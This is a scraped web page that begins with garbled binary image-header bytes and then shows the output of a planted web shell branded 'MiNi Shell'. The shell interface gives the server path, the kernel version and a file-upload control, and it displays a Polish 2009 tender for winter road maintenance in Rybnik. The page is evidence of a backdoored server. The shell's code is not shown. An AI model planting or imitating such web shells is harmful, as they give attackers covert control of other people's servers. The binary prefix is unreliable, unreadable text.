JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091005/345062-N-2009.html

<p class="kh_header"><b>Rybnik: Świadczenie usług zwalczania śliskości i odśnieżania dróg wojewódzkich i powiatowych w sezonie zimowym 2009/2010 z podziałem na zadania.</b><br>
<b>Numer ogłoszenia: 345062 - 2009; data zamieszczenia: 05.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Jankowicka 49, 44-200 Rybnik, woj. śląskie, tel. 032 4227478, 4227874, faks 032 4227479.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdp.powiatrybnicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług zwalczania śliskości i odśnieżania dróg wojewódzkich i powiatowych w sezonie zimowym 2009/2010 z podziałem na zadania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług związanych ze zwalczaniem śliskości i odśnieżaniem dróg wojewódzkich i powiatowych w sezonie zimowym 2009/2010 przy użyciu sprzętu do zimowego utrzymania wraz z obsługą.
Pracami związanymi z zimowym utrzymaniem dróg kieruje Zamawiający poprzez system dyżurów prowadząc stały monitoring stanu dróg i pogody. Akcja zimowa prowadzona będzie z bazy terenowej Zamawiającego zlokalizowanej przy ul. Zwycięstwa w Stanowicach. Zamawiający według potrzeb będzie wydawał dyspozycje dotyczące zakresu prac i czynności do wykonania oraz rodzaju potrzebnego do zimowego utrzymania dróg sprzętu na zasadzie ustnego lub telefonicznego wezwania jednostki sprzętowej wraz z obsługą do pracy. Materiał do zwalczania śliskości zimowej zapewni Zamawiający.
Wykonawca zobowiązany jest do wyposażenia się w środki łączności przewodowej, bezprzewodowej i faksu oraz do udostępnienia ich numerów Zamawiającemu w dniu podpisania umowy. Przedmiot zamówienia został podzielony na zadania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień ;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Spełnienie w/w warunków będzie dokonane na podstawie treści wymaganych dokumentów,                 o których mowa poniżej, na zasadzie  spełnia  lub  nie spełnia  warunku. 
Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu i wymagań określonych przez Zamawiającego, lub którzy nie złożyli pełnomocnictw albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu  zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa , do ich złożenia  w wyznaczonym terminie, chyba że mimo ich uzupełnienia lub złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.  Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków określonych w pkt. 6 SIWZ Wykonawca musi  przedstawić w ofercie:
1)	oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1pkt 1-4 Prawa zamówień publicznych (Dz. U. Z 2007r. Nr 223 poz. 1655) - sporządzić na lub wg druku stanowiącego Załącznik Nr 3 do SIWZ
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu  do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert 
3)	w przypadku składania oferty na Zadanie 1,2,3,4 wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie. Wykonawca musi sporządzić wykaz usług na lub wg druku stanowiącego Załącznik Nr 4 do SIWZ.
Wymagane minimum:
W przypadku składania oferty na Zadanie 1,2,3,4 Wykonawca  musi załączyć do oferty dokumenty potwierdzające, że w okresie ostatnich trzech lat prawidłowo zrealizował minimum jedno zamówienie polegające na wykonaniu usług związanych z zimowym utrzymaniem dróg o wartości porównywalnym
 z przedmiotem zamówienia zakresie tj. na zadanie nr 1 min. 55 000,00 złotych , na zadanie nr 2   minimum 75 000,00 złotych , na zadanie nr 3 minimum 55 000,00 złotych , na zadanie nr 4 minimum 90 000,00 złotych;
4)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi  dysponuje lub będzie dysponował Wykonawca .Wykonawca musi sporządzić wykaz urządzeń na lub wg druku stanowiącego Załącznik Nr 5 do SIWZ. Druk należy wypełnić oddzielnie na każde wybrane zadanie.

Wymagane minimum:
W przypadku składania oferty na Zadanie 1,2,3,4 Wykonawca musi dysponować na każde wybrane zadanie następującym sprzętem:
-	piaskarko-solarka z nośnikiem wyposażonym w pług hydrauliczny lemieszowy typu średniego -1szt.
-	pługi hydrauliczne lemieszowe z nośnikami typu średniego -2 szt.
W przypadku składania oferty na Zadanie 5 Wykonawca musi dysponować   następującym sprzętem:
-	ładowarka o pojemności łyżki do 1,25m3 - 1szt.
W przypadku składania oferty na Zadanie 6,7  Wykonawca musi dysponować na każde wybrane zadanie następującym sprzętem:
-	ładowarka o pojemności łyżki minimum 2,0 m3  - 1szt.
-	
W przypadku składania oferty na Zadanie 8 Wykonawca musi dysponować   następującym sprzętem:
- równiarka samojezdna.
5)   Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń , jeżeli w wykazie wymienionym w pkcie 4 wykonawca wskazał narzędzia i urządzenia , którymi będzie dysponował.
Nadto Zamawiający bezwzględnie wymaga przedstawienia w ofercie:
6) Wypełnionego formularza ofertowego na wybrane zadanie/zadania - sporządzić na lub wg druku stanowiącego  Załącznik Nr 1 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zdp.powiatrybnicki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych, ul. Jankowicka 49, 44-200 Rybnik , pok. 16.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 09:00, miejsce: Zarząd Dróg Powiatowych, ul. Jankowicka 49, 44-200 Rybnik , pok. 14.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> NAZWA  Zadanie 1 - zimowe utrzymanie dróg obręb: Rudy, Kuźnia Raciborska, Sośnicowice, Pilchowice, Knurów, Czerwionka..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania:
Zwalczanie śliskości i odśnieżanie dróg w okresie od 01.11.2009r. do 15.04.2010r. przy użyciu następującego sprzętu: 
-	piaskarko-solarka z nośnikiem wyposażonym w pług hydrauliczny lemieszowy typu średniego -1szt.
-	pługi hydrauliczne lemieszowe z nośnikami typu średniego -2 szt.
Wykaz dróg w zadaniu oraz standard zimowego utrzymania tych dróg określa Załącznik nr 6 do SIWZ.
Piaskarko-solarka wraz z obsługą dyżuruje w bazie terenowej Zamawiającego przy                     ul. Zwycięstwa w Stanowicach i musi być do dyspozycji Zamawiającego przez całą dobę. Piaskarko-solarka wraz z obsługą musi być gotowa do pracy w bazie terenowej Zamawiającego do 40 minut od wezwania Zamawiającego.
Pługi wraz z obsługą muszą być gotowe do pracy w bazie terenowej Zamawiającego  do 2 godzin od wezwania Zamawiającego. Pługi wraz z obsługą po wykonaniu pracy mogą zostać na polecenie Zamawiającego zatrzymane w bazie terenowej Zamawiającego na dyżur..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - zimowe utrzymanie dróg obręb: Bełk, Świerklany.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania:
Zwalczanie śliskości i odśnieżanie dróg w okresie od 01.11.2009r. do 15.04.2010r. przy użyciu następującego sprzętu: 
-	piaskarko-solarka z nośnikiem wyposażonym w pług hydrauliczny lemieszowy typu średniego -1szt.
-	pługi hydrauliczne lemieszowe z nośnikami typu średniego -2 szt.
Wykaz dróg w zadaniu oraz standard zimowego utrzymania tych dróg określa Załącznik nr 6 do SIWZ. 
Piaskarko-solarka wraz z obsługą dyżuruje w bazie terenowej Zamawiającego przy                     ul. Zwycięstwa w Stanowicach i musi być do dyspozycji Zamawiającego przez całą dobę. Piaskarko-solarka wraz z obsługą musi być gotowa do pracy w bazie terenowej Zamawiającego do 40 minut od wezwania Zamawiającego.
Pługi wraz z obsługą muszą być gotowe do pracy w bazie terenowej Zamawiającego    do 2 godzin od wezwania Zamawiającego. Pługi wraz z obsługą po wykonaniu pracy mogą zostać na polecenie Zamawiającego zatrzymane w bazie terenowej Zamawiającego na dyżur..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3- zimowe utrzymanie dróg obręb: Czerwionka -  Leszczyny.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania:
Zwalczanie śliskości i odśnieżanie dróg w okresie od 01.11.2009r. do 15.04.2010r. przy użyciu następującego sprzętu: 
-	piaskarko-solarka z nośnikiem wyposażonym w pług hydrauliczny lemieszowy typu średniego -1szt.
-	pługi hydrauliczne lemieszowe z nośnikami typu średniego -2 szt.
Wykaz dróg w zadaniu oraz standard zimowego utrzymania tych dróg określa Załącznik nr 6 do SIWZ.
Piaskarko-solarka wraz z obsługą dyżuruje w bazie terenowej Zamawiającego przy                     ul. Zwycięstwa w Stanowicach i musi być do dyspozycji Zamawiającego przez całą dobę. Piaskarko-solarka wraz z obsługą musi być gotowa do pracy w bazie terenowej Zamawiającego do 40 minut od wezwania Zamawiającego.
Pługi wraz z obsługą muszą być gotowe do pracy w bazie terenowej Zamawiającego  do 2 godzin od wezwania Zamawiającego. Pługi wraz z obsługą po wykonaniu pracy mogą zostać na polecenie Zamawiającego zatrzymane w bazie terenowej Zamawiającego na dyżur..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4- zimowe utrzymanie dróg obręb: Lyski, Gaszowice,           
                                                                                       Jejkowice, Rydułtowy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania:
Zwalczanie śliskości i odśnieżanie dróg w okresie od 01.11.2009r. do 15.04.2010r. przy użyciu następującego sprzętu: 
-	piaskarko-solarka z nośnikiem wyposażonym w pług hydrauliczny lemieszowy typu średniego -1szt.
-	pługi hydrauliczne lemieszowe z nośnikami typu średniego -2 szt.
Wykaz dróg w zadaniu oraz standard zimowego utrzymania tych dróg określa Załącznik nr 6 do SIWZ. 
Piaskarko-solarka wraz z obsługą dyżuruje w bazie terenowej Zamawiającego przy                     ul. Zwycięstwa w Stanowicach i musi być do dyspozycji Zamawiającego przez całą dobę. Piaskarko-solarka wraz z obsługą musi być gotowa do pracy w bazie terenowej Zamawiającego do 40 minut od wezwania Zamawiającego.
Pługi wraz z obsługą muszą być gotowe do pracy w bazie terenowej Zamawiającego                   do 2 godzin od wezwania Zamawiającego. Pługi wraz z obsługą po wykonaniu pracy mogą zostać na polecenie Zamawiającego zatrzymane w bazie terenowej Zamawiającego na dyżur..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - usługa sprzętowa polegająca na załadunku soli drogowej ładowarką w bazie terenowej Zamawiającego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania:
Usługa sprzętowa polega na załadunku soli drogowej ładowarką (1szt.) o pojemności łyżki do 1,25m3 w bazie terenowej Zamawiającego zlokalizowanej przy ul. Zwycięstwa  w Stanowicach w okresie od 01.11.2009r. do 15.04.2010r.  
Ładowarka wraz z obsługą będzie pełniła 8 godzinny dyżur (w godzinach od 23 do 7) w bazie terenowej Zamawiającego oraz na polecenie Zamawiającego wykonywała prace związane            z załadunkiem soli drogowej na inne jednostki sprzętowe. Zamawiający zastrzega sobie prawo do przedłużenia lub skrócenia czasu trwania 8 godzinnego dyżuru ładowarki  w zależności od panujących warunków atmosferycznych. Każdorazowo, w sytuacji gdy   w czasie trwania dyżuru ładowarki, jednostka ta zostanie wezwana do wykonania pracy,   to czas trwania dyżuru będzie pomniejszony o czas trwania pracy.
Ładowarka wraz z obsługą musi być gotowa do pracy w bazie terenowej Zamawiającego  do 2 godzin od wezwania Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6 - zimowe utrzymanie dróg polegające na odśnieżaniu dróg wojewódzkich ładowarką.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania:
Odśnieżanie dróg wojewódzkich utrzymywanych przez ZDP Rybnik w okresie                           od 01.11.2009r. do 15.04.2010r. przy użyciu ładowarki (1szt.) o pojemności łyżki minimum 2,0 m3.
Ładowarka wraz z obsługą będzie wzywana przez Zamawiającego do pracy w przypadku wystąpienia bardzo trudnych warunków atmosferycznych.
Ładowarka wraz z obsługą musi być gotowa do pracy w bazie terenowej Zamawiającego             do 2 godzin od wezwania Zamawiającego.
Wykaz dróg wojewódzkich oraz standard zimowego utrzymania tych dróg określa Załącznik nr 6 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 - zimowe utrzymanie dróg polegające na odśnieżaniu dróg powiatowych ładowarką.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania:
Odśnieżanie dróg powiatowych w okresie od 01.11.2009r. do 15.04.2010r. przy użyciu ładowarki (1szt.) o pojemności łyżki minimum 2,0 m3.
Ładowarka wraz z obsługą będzie wzywana przez Zamawiającego do pracy w przypadku wystąpienia bardzo trudnych warunków atmosferycznych.
Ładowarka wraz z obsługą musi być gotowa do pracy w bazie terenowej Zamawiającego               do 2 godzin od wezwania Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8 - zimowe utrzymanie dróg polegające na odśnieżaniu dróg wojewódzkich i powiatowych równiarką samojezdną.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania:
Odśnieżanie dróg wojewódzkich i powiatowych w okresie od 01.11.2009r. do 15.04.2010r. przy użyciu równiarki samojezdnej (1szt.).
Równiarka wraz z obsługą będzie wzywana przez Zamawiającego do pracy w przypadku wystąpienia bardzo trudnych warunków atmosferycznych.
Równiarka wraz z obsługą musi być gotowa do pracy w bazie terenowej Zamawiającego  do 2 godzin od wezwania Zamawiającego.
Wykaz dróg wojewódzkich i powiatowych oraz standard zimowego utrzymania tych dróg  określa Załącznik nr 6 do SIWZ.
5. Wykonawca zobowiązany jest do wyposażenia się w środki łączności przewodowej, bezprzewodowej i faksu oraz do udostępnienia ich numerów Zamawiającemu w dniu podpisania umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com